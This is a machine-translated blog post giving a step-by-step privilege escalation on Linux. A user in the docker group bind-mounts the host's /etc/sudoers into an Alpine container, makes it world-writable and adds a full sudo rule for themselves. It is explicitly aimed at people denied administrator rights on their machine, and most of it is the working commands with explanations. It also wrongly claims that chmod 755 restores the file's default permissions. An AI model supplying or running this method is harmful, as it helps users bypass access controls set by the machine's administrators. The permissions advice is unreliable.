How to get access to the admin on Linux using Docker?
Maciej Budzyński
Posted on June 13, 2022
You don't have administrator rights on local hardware? Do you have Linux and Docker? If the answer to the above questions is yes, in this article I will show you how to use Docker to modify the sudoers
file, thanks to which you will get administrator privileges.
This article was translated from Polish using Google Translate. The original post can be found on my blog at https://blog.budzynskimaciej.pl.
Prerequisites
The method presented here requires that the restricted user has access to docker commands, i.e. the user belongs to the docker group. Docker configuration requires that the user belongs to this group. This method only works on Linux (tested on Ubuntu).
TLDR
- Run alpine linux with the file
/etc/sudoers
mounted assudoers
in the container:
docker run -it -v /etc/sudoers:/sudoers --rm alpine /bin/sh
- Changing permissions to edit
sudoers
with vi:
chmod 777 sudoers
vi sudoers
- Adding the required permissions to the user in the
sudoers
file (thei
key to add an entry):
# A tab is required between user and ALL (TAB once, not 4 spaces)
user ALL=(ALL:ALL) ALL
- Exit save from vi:
:wq
- Re-changing the permissions of the
sudoers
file to the default values and exiting the container console:
chmod 755 sudoers
exit
- Verifying changes to the
sudoers
:
cat /etc/sudoers
sudo su
Description of individual commands
docker run -it -v /etc/sudoers:/sudoers –rm alpine /bin/sh
This command allows you to get an alpine linux image and then fire the container from that image. The -it
parameter is responsible for launching interactive mode (keeps STDIN
open, even if it's not connected) and allocating a pseudo-TTY. The -v
parameter binds the host directory or file to the container volume. In this case, we bind the host file /etc/sudoers
to the sudoers
file in the root of our container. The --rm
parameter causes the created container to be deleted when exiting and exiting the shell. The alpine /bin/sh
fragment is responsible for selecting the image from which the container will be created (in this case, linux alpine) and launching the command (program) /bin/sh
, i.e. the system shell.
chmod 777 sudoers and vi sudoers
The /etc/sudoers
file is protected against editing by default. Due to alpine being a minimalistic linux distro it comes with the vi file editor by default. sudoers
file should be edited with visudo
, however alpine does not have this installed by default. In order to edit the file, give full permission to the file to the current user using the chmod 777 sudoers
command launched in the alpine container. Then you can open the sudoers
file using the vi editor with the command: vi sudoers
. To enter text in the vi editor, press the i
button on the keyboard.
user ALL=(ALL:ALL) ALL
The above entry allows you to add user permissions to execute all commands. The first field indicates the name of the user affected by the rule (user
). The first ALL
means that this rule applies to all hosts. The second ALL
means that user user can run commands as all users. The third ALL
means that user user can run commands as all groups. The fourth ALL
means that these rules apply to all commands (commands). Remember to keep the appropriate formatting in the file. In Ubuntu, between user
and ALL
was a single tab spacing (not four spaces). Personally, I'm not sure if using a single space or 4 spaces won't break anything, so I kept the target formatting to be sure.
Exiting vi
To exit the vi editor and save changes, press the esc
key on the keyboard, and then type :wq
. The commands after the colon are commands for vi. w
means that we want to save the changes made to the file and q
means close the file.
chmod 755 sudoers and exit
We change the permissions on the sudoers file to the default values before editing, and then exit the container shell with the exit
command. Upon departure, the alpine container will be removed. Only the downloaded image will remain on the disk.
cat /etc/sudoers and sudo su
In order to verify the accesses, we can use the command cat /etc/sudoers
to check if the entries were added correctly. We can also use the sudo su
command to check if we can execute commands as sudo.
Conclusion
As you can see, docker allows you to change user permissions and modify files that we do not have access to by default. The Docker group belongs to the administration groups, so that a user in this group who has access to execute docker commands has the option of any modification of files without the need to access administrator rights.
Posted on June 13, 2022
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.